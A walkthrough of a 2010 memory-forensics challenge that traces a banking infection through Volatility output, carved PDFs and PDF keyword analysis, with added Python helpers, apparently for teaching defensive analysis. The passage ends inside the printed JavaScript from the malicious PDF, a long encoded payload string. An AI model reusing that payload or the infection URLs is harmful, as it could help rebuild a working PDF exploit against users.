Challenge 3 of the Forensic Challenge 2010 – Banking Troubles

This challenge is about analyzing a memory dump. Since it was my first time doing one, I referred to an existing solution. I got to know the Volatility tool for the first time and feel I have picked up a reasonable grasp of how to use it, which is rather satisfying.
http://www.honeynet.org/challenges/2010_3_banking_troubles

1. List the processes that were running on the victim’s machine. Which process was most likely responsible for the initial exploit? (2pts)

First, the process list can be obtained with Volatility (https://www.volatilesystems.com/default/volatility).
The batch file at http://volatility.googlecode.com/files/vol-Report%28win%29.zip makes the analysis more convenient.
For more detail, see http://ykei.egloos.com/5054373.
[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility pslist -f Bob.vmem
Name                 Pid    PPid   Thds   Hnds   Time
System               4      0      58     573    Thu Jan 01 00:00:00 1970
smss.exe             548    4      3      21     Fri Feb 26 03:34:02 2010
csrss.exe            612    548    12     423    Fri Feb 26 03:34:04 2010
winlogon.exe         644    548    21     521    Fri Feb 26 03:34:04 2010
services.exe         688    644    16     293    Fri Feb 26 03:34:05 2010
lsass.exe            700    644    22     416    Fri Feb 26 03:34:06 2010
vmacthlp.exe         852    688    1      35     Fri Feb 26 03:34:06 2010
svchost.exe          880    688    28     340    Fri Feb 26 03:34:07 2010
svchost.exe          948    688    10     276    Fri Feb 26 03:34:07 2010
svchost.exe          1040   688    83     1515   Fri Feb 26 03:34:07 2010
svchost.exe          1100   688    6      96     Fri Feb 26 03:34:07 2010
svchost.exe          1244   688    19     239    Fri Feb 26 03:34:08 2010
spoolsv.exe          1460   688    11     129    Fri Feb 26 03:34:10 2010
vmtoolsd.exe         1628   688    5      220    Fri Feb 26 03:34:25 2010
VMUpgradeHelper      1836   688    4      108    Fri Feb 26 03:34:34 2010
alg.exe              2024   688    7      130    Fri Feb 26 03:34:35 2010
explorer.exe         1756   1660   14     345    Fri Feb 26 03:34:38 2010
VMwareTray.exe       1108   1756   1      59     Fri Feb 26 03:34:39 2010
VMwareUser.exe       1116   1756   4      179    Fri Feb 26 03:34:39 2010
wscntfy.exe          1132   1040   1      38     Fri Feb 26 03:34:40 2010
msiexec.exe          244    688    5      181    Fri Feb 26 03:46:06 2010
msiexec.exe          452    244    0      -1     Fri Feb 26 03:46:07 2010
wuauclt.exe          440    1040   8      188    Sat Feb 27 19:48:49 2010
wuauclt.exe          232    1040   4      136    Sat Feb 27 19:49:11 2010
firefox.exe          888    1756   9      172    Sat Feb 27 20:11:53 2010
AcroRd32.exe         1752   888    8      184    Sat Feb 27 20:12:23 2010
svchost.exe          1384   688    9      101    Sat Feb 27 20:12:36 2010
[/code]

Since the problem is described as starting after a PDF file was opened, the process in which the exploit ran appears to be AcroRd32.exe.
The AcroRd32.exe process has PID 1752 and PPID 888, and PID 888 is firefox.exe.

So the problem can be traced to a PDF file opened from the Firefox web browser.

2. List the sockets that were open on the victim’s machine during infection. Are there any suspicious processes that have sockets open? (4pts)

[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility connscan2 -f Bob.vmem
Local Address             Remote Address            Pid
------------------------- ------------------------- ------

192.168.0.176:1176        212.150.164.203:80        888
192.168.0.176:1189        192.168.0.1:9393          1244
192.168.0.176:2869        192.168.0.1:30379         1244
192.168.0.176:2869        192.168.0.1:30380         4
0.0.0.0:0                 80.206.204.129:0          0
127.0.0.1:1168            127.0.0.1:1169            888
192.168.0.176:1172        66.249.91.104:80          888
127.0.0.1:1169            127.0.0.1:1168            888
192.168.0.176:1171        66.249.90.104:80          888
192.168.0.176:1178        212.150.164.203:80        1752
192.168.0.176:1184        193.104.22.71:80          880
192.168.0.176:1185        193.104.22.71:80          880
[/code]

Looking up PID 1752 gives 212.150.164.203, and the Firefox browser (PID 888) also has a record of connecting to 212.150.164.203.
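To make the reasoning of questions 1 and 2 mechanical instead of eyeballing two tables, here is an added Python example (not part of the original write-up) that parses pslist and connscan2 output, walks the PPID chain for a given PID, and lists the remote hosts that more than one process talked to. The two tables are trimmed copies of the output above, embedded as constructed sample input; a PID with no pslist entry (PID 0, or an exited process whose socket object survived in memory) is kept under a pid:N label rather than dropped.

```python
"""Rebuild the process tree from pslist and join connscan2 sockets to process names.
Constructed sample tables below are trimmed copies of the Volatility output above."""
import re
from collections import defaultdict

PSLIST = """\
Name                 Pid    PPid   Thds   Hnds   Time
System               4      0      58     573    Thu Jan 01 00:00:00 1970
services.exe         688    644    16     293    Fri Feb 26 03:34:05 2010
svchost.exe          880    688    28     340    Fri Feb 26 03:34:07 2010
svchost.exe          1244   688    19     239    Fri Feb 26 03:34:08 2010
explorer.exe         1756   1660   14     345    Fri Feb 26 03:34:38 2010
firefox.exe          888    1756   9      172    Sat Feb 27 20:11:53 2010
AcroRd32.exe         1752   888    8      184    Sat Feb 27 20:12:23 2010
"""

CONNSCAN = """\
Local Address             Remote Address            Pid
------------------------- ------------------------- ------
192.168.0.176:1176        212.150.164.203:80        888
192.168.0.176:1189        192.168.0.1:9393          1244
0.0.0.0:0                 80.206.204.129:0          0
127.0.0.1:1168            127.0.0.1:1169            888
192.168.0.176:1172        66.249.91.104:80          888
192.168.0.176:1178        212.150.164.203:80        1752
192.168.0.176:1184        193.104.22.71:80          880
"""


def parse_pslist(text):
    """Return {pid: (name, ppid)} from the whitespace-separated pslist table."""
    procs = {}
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split()
        if len(parts) >= 3 and parts[1].isdigit() and parts[2].isdigit():
            procs[int(parts[1])] = (parts[0], int(parts[2]))
    return procs


def parse_connscan(text):
    """Return [(local, remote, pid)]; header and separator rows do not match the pattern."""
    row = re.compile(r"^(\S+:\d+)\s+(\S+:\d+)\s+(\d+)\s*$")
    conns = []
    for line in text.splitlines():
        m = row.match(line)
        if m:
            conns.append((m.group(1), m.group(2), int(m.group(3))))
    return conns


def ancestry(procs, pid):
    """Follow PPID links upward until a PID that is not in the list (or a loop)."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        name, ppid = procs[pid]
        chain.append(name)
        pid = ppid
    return chain


def shared_remote_hosts(procs, conns):
    """Remote IP -> sorted process names, for IPs contacted by more than one process.
    A PID missing from pslist is reported as 'pid:N' so the socket is not silently lost."""
    by_host = defaultdict(set)
    for _local, remote, pid in conns:
        host = remote.rsplit(":", 1)[0]
        by_host[host].add(procs[pid][0] if pid in procs else "pid:%d" % pid)
    return {h: sorted(n) for h, n in by_host.items() if len(n) > 1}


if __name__ == "__main__":
    procs = parse_pslist(PSLIST)
    conns = parse_connscan(CONNSCAN)
    print(" <- ".join(ancestry(procs, 1752)))        # AcroRd32.exe <- firefox.exe <- explorer.exe
    for host, names in shared_remote_hosts(procs, conns).items():
        print(host, names)                           # 212.150.164.203 ['AcroRd32.exe', 'firefox.exe']
```

The chain stops at explorer.exe because its parent (PID 1660) is not in the list, which is normal for a logged-on session: userinit.exe exits after starting the shell. The only remote host shared by two processes is 212.150.164.203, and the two processes are exactly the parent/child pair found in question 1.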

3. List any suspicious URLs that may be in the suspected process’s memory. (2pts)

[code lang-bash]strings Bob.vmem | grep http > output.txt
[/code]

The above command saves the results to output.txt. There is an awful lot of it -_-

4. Are there any other processes that contain URLs that may point to banking troubles? If so, what are these processes and what are the URLs? (4pts)

Searching the list saved in question 3 with the following command gives the result below.
[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>cat output | grep bank
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias//GotoWelcome
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias/
/GotoWelcome
Ahttps://onlineeast#.bankofamerica.com/cgi-bin/ias//GotoWelcome
.
.
.
[rest omitted]
[/code]
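strings Bob.vmem | grep http only sees 8-bit strings. Much of what a Windows process holds in memory (browser history, URL caches, shell paths) is UTF-16LE, which GNU strings reports only with -e l, so a grep over the default output can miss URLs that are actually present. The following added Python example, not from the write-up, scans a raw image for URLs in both encodings, then filters and aggregates by host the way the grep for bank in question 4 does. The image bytes are constructed from URLs shown on this page, with one of them stored as UTF-16LE.

```python
"""URL extraction from a raw memory image: ASCII hits (what `strings | grep http`
gives) plus UTF-16LE hits (what `strings -e l` would add), then grep-style
filtering and per-host aggregation."""
import re
from collections import Counter

URL_CHARS = rb"A-Za-z0-9._~:/?#@!$&'()*+,;=%-"
ASCII_URL = re.compile(rb"https?://[" + URL_CHARS + rb"]+")
# Same pattern widened: in UTF-16LE every ASCII code unit is the byte followed by 0x00.
WIDE_URL = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[" + URL_CHARS + rb"]\x00)+"
)


def extract_urls(image: bytes) -> Counter:
    """Count every URL occurrence found as ASCII or as UTF-16LE."""
    found = Counter()
    for m in ASCII_URL.finditer(image):
        found[m.group().decode("ascii")] += 1
    for m in WIDE_URL.finditer(image):
        found[m.group().decode("utf-16-le")] += 1
    return found


def urls_matching(urls: Counter, keyword: str) -> dict:
    """Case-insensitive substring filter, i.e. `grep -i keyword`."""
    kw = keyword.lower()
    return {u: n for u, n in urls.items() if kw in u.lower()}


def hosts(urls: Counter) -> Counter:
    """Collapse a long URL list to hit counts per host (sort | uniq -c on the host part)."""
    per_host = Counter()
    for u, n in urls.items():
        per_host[re.sub(r"^https?://([^/]+).*$", r"\1", u)] += n
    return per_host


# Constructed sample "memory image": URLs from the write-up embedded in junk bytes,
# the PDF.php one stored as UTF-16LE so the ASCII pass cannot see it.
SAMPLE_IMAGE = (
    b"\x00\x90junk"
    + b"https://onlineeast#.bankofamerica.com/cgi-bin/ias//GotoWelcome\x00"
    + b"\x41\x42garbage"
    + "http://search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0".encode("utf-16-le")
    + b"\x00\x00"
    + b"http://search-network-plus.com/favicon.ico\x00"
    + b"https://onlineeast#.bankofamerica.com/cgi-bin/ias//GotoWelcome\x00"
)

if __name__ == "__main__":
    urls = extract_urls(SAMPLE_IMAGE)
    for u, n in urls_matching(urls, "bank").items():
        print(n, u)
    print(hosts(urls))
```

On the sample the ASCII pass finds the two bank URLs and the favicon; the PDF.php URL only appears through the UTF-16LE pass. Aggregating by host turns thousands of grep lines into a handful of domains, which is a far quicker way to spot search-network-plus.com next to a bank.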

5. Were there any files that were able to be extracted from the initial process? How were these files extracted? (6pts)

First, use Volatility to dump the process with PID 1752.
[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility usrdmp_ex_2 -f Bob.vmem -p 1752
[/code]

After the dump is saved, configure the Scalpel conf file to carve only PDF files; running it yields a total of 9 files.
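Scalpel works purely on byte patterns: each conf line names an extension, a case-sensitivity flag, a maximum size, a header and a footer, and every header-to-footer span found in the input is written out as a file. The added Python example below (neither Scalpel's code nor the write-up's) reimplements that for PDF over a constructed sample dump, so the behaviour behind the nine carved files is visible, including why some of them come out damaged: a header whose tail was paged out has no footer, and a header whose bytes are corrupted gets no version from file.

```python
"""Header/footer carving for PDF, the technique Scalpel applies with its conf entry.
Constructed sample dump below; real input is the process dump from usrdmp_ex_2."""
import re

PDF_HEADER = re.compile(rb"%PDF-\d\.\d")
PDF_FOOTER = b"%%EOF"


def carve_pdfs(blob: bytes, max_size: int = 5_000_000):
    """Return (carved, truncated): carved is [(offset, data)] for every header that
    has a footer before the next header or before max_size; truncated lists the
    offsets of headers with no footer in range."""
    carved, truncated = [], []
    starts = [m.start() for m in PDF_HEADER.finditer(blob)]
    for i, start in enumerate(starts):
        limit = starts[i + 1] if i + 1 < len(starts) else len(blob)
        region = blob[start:min(limit, start + max_size)]
        # Take the *last* footer in range: incrementally updated PDFs carry several %%EOF.
        end = region.rfind(PDF_FOOTER)
        if end == -1:
            truncated.append(start)
            continue
        carved.append((start, region[:end + len(PDF_FOOTER)]))
    return carved, truncated


def pdf_version(data: bytes):
    """The version `file` would print, or None when the header bytes are damaged
    (compare the 'version .' and 'version %..' lines in the file output above)."""
    m = re.match(rb"%PDF-(\d\.\d)", data)
    return m.group(1).decode() if m else None


def make_pdf(version: bytes, body: bytes) -> bytes:
    """Build a minimal well-formed PDF-shaped blob for the sample."""
    return b"%PDF-" + version + b"\n" + body + b"\n%%EOF\n"


# Constructed sample process dump: two complete PDFs and one header whose tail is gone.
SAMPLE_DUMP = (
    b"\x00" * 16
    + make_pdf(b"1.5", b"1 0 obj << /Type /Catalog >> endobj")
    + b"\xff\xfe unrelated heap data "
    + b"%PDF-1.4\n2 0 obj << /Type /Pages"           # no %%EOF follows this one
    + b"\x00" * 8
    + make_pdf(b"1.3", b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj")
)

if __name__ == "__main__":
    files, partial = carve_pdfs(SAMPLE_DUMP)
    for off, data in files:
        print("offset %d: %d bytes, version %s" % (off, len(data), pdf_version(data)))
    print("truncated headers at", partial)
```

Lowering max_size shows the other failure mode: when the footer lies beyond the size limit nothing is carved for that header, which is why the Scalpel conf value has to be generous for PDFs that embed fonts or images.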

6. If there was a file extracted from the initial process, what techniques did it use to perform the exploit? (8pts)

First, checking the carved files with the file command gives the following.
[code lang-bash]D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>file

00000000.pdf:  data
00000001.pdf:  data
00000002.pdf:  PDF document, version .
00000003.pdf:  PDF document, version %..
00000004.pdf:  PDF document, version 1.5
00000005.pdf:  PDF document, version 1.5
00000006.pdf:  PDF document, version 1.5
00000007.pdf:  PDF document, version 1.4
00000008.pdf:  PDF document, version 1.3
[/code]

Only files 4, 5, 6, 7 and 8 look like valid files, so checking those with PDFiD (http://blog.didierstevens.com/2009/03/31/pdfid/) shows that file 6 contains JavaScript.
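PDFiD counts name keywords, and the reason a plain grep is not enough shows up further down in the object 1054 dictionary, where /Filter is spelled [/F#6c#61#74e#44e#63#6fde/#41#53#43II#38#35#44#65#63#6fd#65]: PDF lets any byte of a name be written as #xx, so /JavaScript can just as well be written /J#61vaScript. The following added Python example (not pdfid.py itself, which also handles this) resolves those escapes before counting, and additionally lists which names were escaped, since legitimate PDF writers rarely escape plain letters. The sample PDF is constructed to mirror the object layout shown on this page.

```python
"""PDFiD-style keyword counting with PDF name escapes (#xx) resolved first.
Constructed sample document below; real input is the carved 00000006.pdf."""
import re
from collections import Counter

KEYWORDS = ["/JS", "/JavaScript", "/AA", "/OpenAction", "/Encrypt", "/ObjStm",
            "/RichMedia", "/JBIG2Decode", "/Page", "/FlateDecode", "/ASCII85Decode"]

# A name token runs from '/' up to the next whitespace or delimiter character.
NAME_TOKEN = re.compile(rb"/[^\s/\[\]<>(){}%]*")
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(token: bytes) -> bytes:
    """/F#6c#61#74e#44e#63#6fde -> /FlateDecode"""
    return HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), token)


def normalize_names(data: bytes) -> bytes:
    """Rewrite every name token with its escapes resolved; everything else untouched."""
    return NAME_TOKEN.sub(lambda m: decode_name(m.group()), data)


def escaped_names(data: bytes):
    """Names that used #xx escapes, decoded. Escaping ordinary letters has no
    legitimate purpose, so an escaped /JavaScript or /FlateDecode is itself a signal."""
    return [decode_name(t) for t in NAME_TOKEN.findall(data) if b"#" in t]


def count_keywords(data: bytes) -> Counter:
    """Occurrences of each keyword as a whole name (so /Page does not count /Pages)."""
    norm = normalize_names(data)
    counts = Counter()
    for kw in KEYWORDS:
        counts[kw] = len(re.findall(re.escape(kw.encode()) + rb"(?![A-Za-z0-9])", norm))
    counts["obj"] = len(re.findall(rb"\bobj\b", norm))       # \b keeps endobj out
    counts["endobj"] = len(re.findall(rb"\bendobj\b", norm))
    return counts


# Constructed sample: the object layout the pdf-parser output on this page shows
# (an /AA action pointing at a /JavaScript object whose stream uses the two
# hex-escaped filter names), plus the /JavaScript name itself escaped.
SAMPLE_PDF = (
    b"%PDF-1.5\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /AA << /O 11 0 R >> >> endobj\n"
    b"11 0 obj << /S /J#61vaScript /JS 1054 0 R >> endobj\n"
    b"1054 0 obj << /Length 0000 /Filter [/F#6c#61#74e#44e#63#6fde /#41#53#43II#38#35#44#65#63#6fd#65] >>\n"
    b"stream\n...\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for kw, n in count_keywords(SAMPLE_PDF).items():
        print("%-16s %d" % (kw, n))
    print("escaped names:", escaped_names(SAMPLE_PDF))
```

A grep for the literal string /JavaScript over SAMPLE_PDF returns nothing, while the normalized count returns 1, which is the whole point of the normalization step.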

Examining file 6 with pdf-parser (http://blog.didierstevens.com/programs/pdf-tools/) gives the following.
[code lang-bash]D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdfid.py 00000006.pdf
PDFiD 0.0.10 00000006.pdf
 PDF Header: %PDF-1.5
 obj                  113
 endobj               113
 stream                35
 endstream             35
 xref                   5
 trailer                5
 startxref              4
 /Page                  9
 /Encrypt               1
 /ObjStm                0
 /JS                    1
 /JavaScript            1
 /AA                    1
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Colors > 2^24         0

D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py --search javascript 00000006.pdf
obj 11 0
 Type:
 Referencing: 1054 0 R
 [(1, '\r\n'), (2, '<<'), (2, '/S'), (2, '/JavaScript'), (2, '/JS'), (1, ' '), (3, '1054'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>'), (1, '\r\n')]

 <<
   /S /JavaScript
   /JS 1054 0 R
 >>

D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py -o 11 00000006.pdf
obj 11 0
 Type:
 Referencing:
 [(1, '\r'), (3, '0'), (1, ' \r')]

obj 11 0
 Type:
 Referencing: 1054 0 R
 [(1, '\r\n'), (2, '<<'), (2, '/S'), (2, '/JavaScript'), (2, '/JS'), (1, ' '), (3, '1054'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>'), (1, '\r\n')]

 <<
   /S /JavaScript
   /JS 1054 0 R
 >>

D:\Security Tools\Forensic\scalpel-1.60\pdf\pdf-0-0>pdf-parser.py -o 1054 --raw --filter 00000006.pdf
obj 1054 0
 Type:
 Referencing:
 Contains stream

<</Length 0000/Filter [/F#6c#61#74e#44e#63#6fde/#41#53#43II#38#35#44#65#63#6fd#65]>>

 <<
   /Length 0000
   /Filter [
   /FlateDecode /ASCII85Decode]
 >>

var xtdxJYVm=’011110000010101100000111001011110010000100110111000111110001101100101111010011110010010100110000000100010010011100000010011010010000001100011110001111110010100100101100010000100000001100001101000000110011100000100011010010000010110000011000000100000010111000111001000000100101100100011100000110010010001000011111000000100101110100000000000111110011011100100101001001100010001001101111011111100100101100101001001100100010111100110010001011010110011000101011001110110011001100111001000000000000110101111000011110000001010000110010001110000000001100001011011010000001010001101100001101110010101100011010001110110000010100111001011100010000001000000010001010000000001100110011010001000011110000100100000001100000101100100001001000010010001100000000000101100100111101111011010101100010000100101110000101000010010100111000011010000111010001000101011110010011000101011000001100100011100000111011001001100000001100110000000000110001101001010001000000010010001000011000001101100001111001001111011110100011100000000110001011010001010101100001001011110010001000001100000111010010100001000100001111000000111100111100011011010100100100001010000110110010011001010010010110010100101100110100000101000111011100110111010001100111110100010110000011000111011001011001010011100100000000111001000001010111111000010010011001010101100100001001001000100101101001101001010111110010101100010010000000100101011100011000010010000010111000010000001111000100100100010100011011010110000000101010000001010101010000110001001011010010111000111001000011000110000001001110010111010111010000110110000111100100100001001110000101110001000000010101000100110100011001110110011010000000101000010000000110010101110100100111010100100100111000110100000101000110111100100000011000110111011100011101001100100101111001011011010110010001011000101010000101100101000000110001010001100001001000001001000100110111001100000010011101010101101000110101000001100001110101100100000010100111010100001011001001110001001001111111010111010011101100
11000100010011001101110000011101011001000101000000010000111001010110010001001100001100000110110011111100100100011111110100010101111110001000100000100100000001001001000010111101010000010111100010101100100100010011000111101001111011010000110000100000010010011001110111000001100000011100010001001000011000010000010111100001001100010111100000011000000111010111110100010001100000000011010011101000001100010100100000011101100000001010010011101000111110010100000111001001111011010101110001010100000011011110110101010001111100010000000011001100011110010101000111000000101001010001010000111000010010010011100100111101111100001001100010010100011111011001100101111001011001010001110010100000011001011000000100101100111100011001110000100100000100010011000100101000101110011010000011100100101111010100010100000101011010010111010001100100010111011110000101100000101000000101110011001000111101011001010101110100010100000100100010111000000011001000110011000001010110001011110011101000011010011111010100000001000011010110110011011100011101001101000111101101011111011110110001110100100111011111100100100001111011011101110001111000010010000010110001000100100000011111000011010000011001011100100111110001110010000000100001101100101100010110000111111000010100001011000011010000101111000101000010111100100010000000110011010000100110010110000001001101010100011101000010101000001111010000010111110000000010010101000011101000010100010001110001011000101111010101000011000000011001010100100110011001111001001000000011000000110001010100010101100101100101011101010011011000110100011000010111111000110111010111000010010000111110010111010011000001011100001010000000110000110000011110010000000001110001010100100001100100100110011111110001100101000110010000010010100100001111001101010111110101010111011100100001000000111010011000100110000001001011001110100000100000011101010100110101011101101110001110110001010100010100011011000011011100101011011000100001100100111011010100010101010101011110000101110001110100110110011110010001001000
01100101111100000011000010000101000110011100000100001000101011001111010010111101010110011000000100001101111001000011110001111001110001010101110011100001011101001100100001110101001000000000100011100100000101000111100011000100101101010000010110011000110010000100100010010000000111001011010010101001100001000101100010011000001111000001000010110100101110000110010001100000110100010001100110011001010011000011000010011100000011011011100110101100010101001100110011110000000011000001100001111101010101001100000011011100100101011101100100110100100000001011110000011001110111000000110100011101101111000011000000001001100111010111010111110001111000000100100001101101111001011011100010011100010100000010000001011001011011011000010110000001110010000110000011101100110110011100010001011100101111000100010010110001110010000110000111010100111011001011000010001001000001010010110000001101011110000011100011011001100110011101010100110101001010001010010001101101000100001000010111010000101000001110110000010101001110011001110110001100110010000100110010110101001111010001100111001101111011001010110000011101100001000110110100001101111001000011100010000001001101011101100100000000101101001100100010110001010010001010000011011001101111001100100010001001000011001010100101000000001101001110110010010000111100000111110001011000000110000011010011000001011000011100100100010001110000001001000000000101110010011100100110111101000110001001010011001100010011011111100100010101000110001101100000011101100001011110110100110001110001001100110011111101001111000010100101100001000111001001010001010001111110010100000100011001001100001101010010110000010010010000000100111001100011001111010001001101111100010001110101011000001101001011000011011101101001011101000011011001010011000110100000000001101101011001110111111001111111001001000000011001001010011110100010010101101101000101000001010001111110000000110101111000010001001010110000000100101001000101000111101001010101000101010001100101010100010011100101000101110110001111010000000001
00001101111100011001110001010000010110000110100110011101100110001111100000001000110100000100010011010101010011010001000100110000110100001111010000111000101100010010110100110000101000000110110111111100101111010100100010100000011001000100110101100001011010001100110011001000010001000110000100111101110101011101110111001100110000001100110001010000100111001100000101010100010011001111010010011101000101001000100001011100001010001001110011110000000000010110010110000000000110000000110111000101111001010100100110000000101000000011000110001101111100010100110101101100010011000101100100011001001001010001110111000000011010001101000110001000101111011010110011010000011001001011110111110101101010011111100010110000110010000110010110000001011001010001000100001100001100001111110101100001010001011101000100010000100100001100100111010000000101011110000111011100011010000110000101110001001111011110010001001100100110001101110101100101000000010110100110000000010100000101000110110101110111011001110000000100010011001000110111001100110111010111010011000100010100001100010110011100001000010100000111001000011000000101000101110101110111011110110101010000001010000001100111010101011011011000010000011100110001000110110110111100100011010110110011001000001110001000100110001000001101011000000001011000001010001100000101001101000100011000110011011100111111001100100111011000001011010001110111100000001000000110110100001001101101010111100110010100110101000111000100101000101100010101100101101100000110001011110101010000000111010001110100100000011001001101110111100001011000011001010110011000010101000100100100011001111010011000000111111000001001001001000100000001101100011000010000001100011110001000000111011001000100011110010011111100010011000011110101110101100110011110100111011000000101001100110110110001011011011110010010111100011110000000000110000001000111010110000110011100101000000011110110000001100001011000010110110100110000000110010110000100010010011001100110011000110000001000110100110101011111011111100011010100
01101100000101010001010101110001110011010111110010101000011000010000100101000101011110011101000001101000110010010000000101101001100000001101100001000000011101011011100110001101011100010110010011001100110001010110000100010001110110001010110011100000111000010000000101100101110111011000000101001001111010010110000110000101010010010000010110010001000101010011000110110001111001010001010110111101001010011100100100111001011000010111100110100101101000011001010110000101001010010101010110011101100100010100000101011001100111010000100101001101100000010001000111001001100100011000110110011101011111011010010001110100110011001100000111001100011110001110010001101100111010000011110100101001001011011101000101111001110000011010000111010001110010011111110111001101001011000000100010001000111101011011000001111100010011000100010001000100001111010011000011100100001100011110010010001100110110000111010101001100000111000111110011111100010000000101010110011101111100011100110110110001111100010010010111010101100110010110100010010000010110000010100101001000001101000000010000011100001010001011110101011100001101001110010010101000111011001010100100001000011010000111000000001000010000001110010010010101000010010111000110111000010000000100000001010101101010000010100000101100011000001110000000001101011001001011110011111000110111000100010000011001111000011001110011110000000000001101000011010100001000010001100111001100000000011001100110110001111000011111010011000100010011000001010101011000000001001100110010101000000101001001010100110000100000000101100001100001100010011100100010101000000100010011110101110101111000011110100011101000111000011010110110010101010010011101100111010001101011011111000001111000011001000000110001100100111111010011110011100000001011000100010011100000100100011011100011011000101110001111100010001100111100011000000001000100011111000111010000011100110010010001110111110000000010001101100010010101010101000110000000001000011100001100000001010101101010011001010000011000110001000111110001010100
00011101110111011100010101011101001111010000000101011101101001010111010110010101000011001010110010010000111011001001110010111101111100000000000011111000111101010111100001101100100010001111000101010100000011000001110000010000100011001111110110010001010101011010110011010100000000000010010000010000110010010101110001101000001111000100000000011000100000010101000010110100010110001001110010110000001111011110010100000101100001000101000011111100000010001011010001101100101100000010010010001000010111001000010001100000001001001011000100101100110000000000100011011100101110001110100110111000110010000110110000001000100100001000010111110100011110011011000000001000000110000000100110111000100001000110010010100100000101000001010110100000100101001010010011110101011000010000000010101100110100010111010011011101000100001000010001000100110111010111100010010001010110000010100110011101000000010100000000011000001100000110110010101000100010010001100001011000000000001011100000001100001000011000100011111100000011000101000000001000101101000010100101101001110010011110100101011001010001010101010101111100101011001111110011111000100001000001110101001101101011000001000000011100100000001111110011111101010011001000100011111100101101001101110100110000101111000001110001010000011001000011100010110000011010000001000000000000110011000011110111011100010001001101100010111000111001001000100010111101001011000001000011110100011000000110000000011000000100001100100001110100000010000011100011110000100100000110010001110000000001000000100100010000101111000100000011101000000101001110000101000101010010011010110101010100100100001001010001010101010010000101100010011000001010000000100000101100100111010100010101010100110011011100000000000000011000000000000010000000110111000000000001100100101111011101010001011100010101001111010110101001011100000000100001111100001010001001000111010100110001001100100010101101100101000011110001000100111101011101100000110000111001001010000010100000101011011011110111111001111001000100010001101000
00010000000001000111010001110000100011000111110101001100010110000101100001100001100001001110100010001100000001010110110010001000011101001000010110111100101110001111000000011000111000001010100011111101011010001110000000110000001100011110000000100000111111000110010000000100000100001111000111000001011001010010110010001000000101000000000100011000101001001010000011000100101100011011000100011100100011000001000001100001111001001011000101001100101101001111110010100001100101001101110000010100101001010000110010100100110100001101010001010100000010000110000000111100111000001111100111000001111110011000000000101000001011001011000100100001010111011010110101000000011011000111110010010000110111000100110000010001100111000010110011111100100110011000010010110101100101000000010010000000000101010100000100101000001011011001100110001101101011011101110100001101001000011101000101001001111101001111110011100000100110011111110011110000101000001100110111100101010000001011000010000100011010011111110101011001110110000110110010001001000000000001100100000101011000000010010001100101000011011110100101010101000110001100100000000001000100000011000101101001110110000100110001001101011111011001000100000100101010001011100001110001100010001100110100101000111011000010110011110001110111000011110111111001100110001111100001110001110000001001010001101100000001000011100011011001010110010100100101000101011100001101110011100101000010011010010001001100010100001011100000111101110001010111010111000100000001000101010011110001100010001101010101110001000000000010000010000001001111000100110100011101100000001100100011111101111001011101000110110100110000000011100000001001000110001011000110011100110101000010000001110101010010000100010111011101100100000101110011101000010011010110100010100001111001000001100011100000100110011100000111110000100000001011010010111100110101000011010110100100111000001111110011011001011100001101100001111100001000000011110001100101111111010100000111011000111000001101110011100100100001000010100100110001
00011000111111001000110110000101001001010001010111100100110111001100000110011101111101011111010111110000111000000111100101111001011100011101000111111100101011001110000111100001011110011101100000111100001011001110000101011100100000011010110000010000110101000011010111101101110101010000000101101000110100001000000110001001100001011101010100100100001111001111010111110001011110001011000100001100010110000001010101100001110101011100100010011100010001000111000110001001010001010110010110011100111011001110110111000101100011000011000110001000111111001001010100011101110101000011000110001100000110001110100110010001000111011011000101110000001100001001110101010001110000000001010011110100001101000100100100010101100000001000110011000000011111000111110001011100101111011010000001111000101110000000110101000101000100010100110110011100101100001110000000100001111001011111110111010000001110000110000100000001100000010001100110001100011011001101000011000100011100000100100101010000101101001011000101111001111001011100100001011000101101001011000111000001111111000011100001011000001001001101000000000100110000001010010001000100101111001111100101010000100011010111000100000100011000001000110110011001110001001100000101010000011101000111000111111100110111001101000100000000011010001110000101001101111011010000010010100000110111000100000101000101000111011010110110011000000100001101100101001001011100001000010111111100001000000000110111001000100111010010110011100000110110001100010110101100001100011110010111110000111000001001100111001000001110011001010100011100001010000101100011011101000001010111000110001000101010001110000101000101111110011101100010101000111111000011000101110001001010010010000000010000110000000000000111111000010111000000100101010000101011000100010101100001100010011000110011000100111101001101000111011100101011001011010110001100000110000000010100011101110111010111110000100000101001001011010101011101111111011100100110111100001101001111110100011101001010000001110100111000000100001101110110110100
